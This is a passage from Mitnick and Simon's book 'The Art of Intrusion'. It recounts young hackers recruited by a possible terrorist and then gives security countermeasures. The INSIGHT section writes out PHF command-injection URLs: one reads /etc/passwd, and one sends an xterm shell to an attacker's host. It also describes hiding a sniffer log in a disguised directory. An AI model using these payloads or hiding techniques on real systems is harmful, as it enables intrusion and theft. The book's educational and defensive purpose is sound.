Authors: Kevin D. Mitnick,William L. Simon
Tags: #Computer Hackers, #Computer Security, #Computers, #General, #Security
Comrade's old buddy ne0h works for a major telecom company (a nine- to-five job is "no good," he says), but he'll shortly be in Los Angeles for three months on a manual labor job he took because the pay is so much more than he's making right now. Joining mainstream society, he hopes Chapter 2 When Terrorists Come Calling 41
to put away enough for a down payment on a house in the community where he currently lives.
When the three-month high-paying drudgery is over, ne0h, too, talks about starting college -- but not to study computer science. "Most of the people I've ever run into that have computer science degrees know shit-all," he says. Instead, he'd like to major in business and organiza- tional management, then get into the computer field on a business level.
Talking about his old exploits brings up his Kevin fixation again. To what extent did he imagine himself walking in my shoes?
Did I want to get caught? I did and I didn't. Being caught shows
"I can do it, I did it." It's not like I wanted to get caught on pur-
pose. I wanted to get caught so I would fight it, I would be
released, I would be the hacker that got away. I would get out, get
a good sound job with a government agency and I would fit right
in with the underground.
How Great Is the Threat? The combination of determined terrorists and fearless kid hackers could be disastrous for this country. This episode left me wondering how many other Khalids are out there recruiting kids (or even unpatriotic adults with hacking skills) and who hunger after money, personal recognition, or the satisfaction of successfully achieving difficult tasks. The post- Khalid recruiters may be more secretive and not as easy to identify.
When I was in pretrial detention facing hacking-related charges, I was approached several times by a Columbian drug lord. He was facing life in federal prison without the possibility of parole. He offered me a sweet deal: I would be paid $5 million dollars in cash for hacking into "Sentry" -- the Federal Bureau of Prisons computer system -- and releasing him from custody. This guy was the real thing and deadly seri- ous. I didn't accept his offer, but I gave the impression I would help him out to avoid any confrontation. I wonder what ne0h would have done in a similar situation.
Our enemies may well be training their soldiers in the art of cyber war- fare to attack our infrastructure and defend their own. It seems like a no- brainer that these groups would also recruit knowledgeable hackers from anywhere in the world for training and for mission-critical projects.
In 1997 and again in 2003, the Department of Defense launched Operation Eligible Receiver -- an effort to test the vulnerability of this nation to electronic attack. According to an account published in the Washington Times10 about the earlier of these efforts, "Senior Pentagon leaders were stunned by a military exercise showing how easy it is for 42 The Art of Intrusion
hackers to cripple U.S. military and civilian computer networks." The article goes on to explain that the National Security Agency assembled a group of its computer specialists as a "red team" of hackers, allowed to use only off-the-shelf computer equipment available to the public, along with any hacking tools, including exploit code, they could download from the Internet or electronic bulletin boards.
In a few days the red team hackers infiltrated the computer systems controlling parts of the nation's electric power grid and with a series of commands could have turned sections of the country dark. "If the exer- cise had been real," the Christian Science Monitor reported, "they could have disrupted the Department of Defense's communication systems (taking out most of the Pacific Command) and gained access to com- puter systems aboard U.S. Navy vessels."11
In my own personal experience, I was able to defeat security mechanisms used by a number of Baby Bells to control access to telephone switches. A decade ago, I had complete control over most switches managed by Pacific Bell, Sprint, GTE, and others. Imagine the chaos that a resource- ful terrorist group could have wreaked with the same level of access.
Members of Al Qaeda and other terrorist groups have a record of using computer networks in planning terrorist acts. Evidence suggests that ter- rorists made some use of the Internet in planning their operations for the 9/11 attacks.
If Khalid Ibrahim was successful in getting information through any of the young hackers, no one is acknowledging it. If he was really connected with the attacks on the World Trade Center and the Pentagon, definitive proof is missing. Yet no one knows when he or one of his kind will reap- pear on the cyberspace scene, trolling for naive helpers who get a thrill out of "doing shit you're not supposed to be doing, going places you're not supposed to go." Kids who might think that the challenge they're being offered is "cool."
For young hackers, weak security remains a continuing invitation. Yet the hackers in this story should have recognized the danger in a foreign national recruiting them to compromise sensitive U.S. computer net- works. I have to wonder how many other ne0hs have been recruited by our enemies.
Good security was never more important than in a world populated by terrorists.
INSIGHT ne0h provided us with details on how he hacked into the Lockheed Martin computer systems. The story is a testimony both to the innovation Chapter 2 When Terrorists Come Calling 43
of hackers ("If there's a flaw in the security, we'll find it" might be the hacker motto) and a cautionary tale for every organization.
He quickly determined that Lockheed Martin was running its own Domain Name Servers. DNS, of course, is the Internet protocol that, for example, translates ("resolves") www.disney.com into 198.187.189.55, an address that can be used to route message packets. ne0h knew that a secu- rity research group in Poland had published what hackers call an exploit -- a program specifically design to attack one particular vulnerability -- to take advantage of a weakness in the version of the DNS that Lockheed was running.
The company was using an implementation of the DNS protocols called BIND (Berkeley Internet Name Domain). The Polish group had found that one version of BIND was susceptible to a type of attack involving a remote buffer overflow, and that version was the one being used at Lockheed Martin. Following the method he had discovered online, ne0h was able to gain root (administrative) privileges on both the primary and secondary Lockheed DNS servers.
After gaining root, ne0h set out to intercept passwords and e-mail by installing a sniffer program, which acts like a computer wiretap. Any traf- fic being sent over the wire is covertly captured; the hacker usually sends the data to be stored in a place where it will be unlikely to be noticed. To hide the sniffer log, ne0h says, he created a directory with a name that was simply a space, represented by three dots; the actual path he used was "/var/adm/ ..." Upon a brief inspection, a system administrator might overlook this innocuous item.
This technique of hiding the sniffer program, while effective in many situations, is quite simple; much more sophisticated methods exist for covering a hacker's tracks in a situation like this.
Before ever finding out if he would be able to penetrate further into the Lockheed Martin network to obtain company confidential information, ne0h was diverted to another task. Lockheed Martin's sensitive files remained safe.
For the White House hack, Zyklon says he initially ran a program called a CGI (common gateway interface) scanner, which scans the target sys- tem for CGI vulnerabilities. He discovered the Web site was susceptible to attack using the PHF exploit, which takes advantage of a programmer error made by the developer of the PHF (phone book) script.
PHF is a form-based interface that accepts a name as input and looks up the name and address information on the server. The script called a func- tion escape_shell_cmd(), which was supposed to sanitize the input for any special characters. But the programmer had left one character off his list, the newline character. A knowledgeable attacker could take advantage of 44 The Art of Intrusion
this oversight by providing input into the form that included the encoded version (0x0a) of the newline character. Sending a string with this char- acter tricks the script into executing any command that the attacker chooses.
Zyklon typed into his browser the URL:
http://www.whitehouse.gov/cgi-bin/phf?Qalias=x%0a/bin/
cat%20/etc/passwd
With this, he was able to display the password file for whitehouse.gov. But he wanted to gain full control over the White House Web server. He knew it was highly likely that the X server ports would be blocked by the firewall, which would prevent him from connecting to any of those serv- ices on whitehouse.gov. So instead, he again exploited the PHF hole by entering
http://www.whitehouse.gov/cgi-bin/phf?Qalias=x%0a/usr/
X11R6/bin/xterm%20-ut%20-display%20zyklons.ip.address:0.0
This caused an xterm to be sent from the White House server to a com- puter under his control running an X server. That is, instead of connect- ing to whitehouse.gov, in effect he was commanding the White House system to connect to him. (This is only possible when the firewall allows outgoing connections, which was apparently the case here.)
He then exploited a buffer overflow vulnerability in the system pro- gram -- ufsrestore. And that, Zyklon says, enabled him to gain root on whitehouse.gov, as well as access to the White House mail server and other systems on the network.
COUNTERMEASURES The exploits of ne0h and Comrade described here raise two issues for all companies.
The first is simple and familiar: Keep current on all the latest operating system and application releases from your vendors. It's essential to exer- cise vigilance in keeping up with and installing any security-related patches or fixes. To make sure this isn't done on a hit-or-miss basis, all companies should develop and implement a patch management program, with the goal of alerting the appropriate personnel whenever a new patch is issued on products the company uses -- operating system software in particular, but also application software and firmware.
And when a new patch becomes available, it must be installed as soon as possible -- immediately, unless this would disrupt corporate opera- tions; otherwise, at the earliest practical time. It's not hard to understand Chapter 2 When Terrorists Come Calling 45
overworked employees who yield to the pressure of focusing on those highly visible projects (installing systems for new workers, to give just one example) and getting around to installing patches on a time-available basis. But if the unpatched device is publicly accessible from the Internet, that creates a very risky situation.
Numerous systems are compromised because of the lack of patch man- agement. Once a vulnerability is publicly disclosed, the window of expo- sure is significantly increased until the vendor has released a patch that fixes the problem, and customers have installed it.
Your organization needs to make the installing of patches a high-priority item, with a formal patch management process that reduces the window of exposure as quickly as possible subject to the demands of not interfering with critical business operations.
But even being vigilant about installing patches isn't enough. ne0h says that some of the break-ins in which he participated were accomplished through the use of "zero-day" exploits -- a break-in based on a vulnera- bility that is not known to others outside a very small group of hacker bud- dies. "Zero day" is the day they first exploit the vulnerability, and hence the day the vendor and the security community first become aware of it.
Because there is always a potential to be compromised by a zero-day exploit, every organization using the flawed product is vulnerable until a patch or workaround is released. So how do you mitigate the risk of this exposure?
I believe the only viable solution lies in using a defense in depth model. We must assume that our publicly accessible computer systems will be vulnerable to a zero-day attack at some point in time. Thus, we should create an environment that minimizes the potential damage a bad guy can do. One example, as mentioned earlier, is to place publicly accessible systems on the DMZ of the company firewall. The term DMZ, borrowed from the military/political abbreviation for demilitarized zone, refers to setting up network architecture so that systems the public has access to (Web servers, mail servers, DNS servers, and the like) are isolated from sensitive systems on the corporate network. Deploying a network archi- tecture that protects the internal network is one example of defense in depth. With this arrangement, even if hackers discover a previously unknown vulnerability and a Web server or mail server is compromised, the corporate systems on the internal network are still protected by another layer of security.
Companies can mount another effective countermeasure by monitor- ing the network or individual hosts for activity that appears unusual or suspicious. An attacker usually performs certain actions once he or she has successfully compromised a system, such as attempting to obtain 46 The Art of Intrusion
encrypted or plaintext passwords, installing a back door, modifying con- figuration files to weaken security, or modifying system, application, or log files, among other efforts. Having a process in place that monitors for these types of typical hacker behavior and alerts the appropriate staff to these events can help with damage control.
On a separate topic, I've been interviewed countless times by the press about the best ways to protect your business and your personal computer resources in today's hostile environment. One of my basic recommenda- tions is to use a stronger form of authentication than static passwords. You will never know, except perhaps after the fact, when someone else has found out your password.
A number of second-level sign-on techniques are available to be used in combination with a traditional password, to provide much greater security. In addition to RSA's SecureID, mentioned earlier, SafeWord PremierAccess offers passcode-generating tokens, digital certificates, smart cards, biometrics, and other techniques.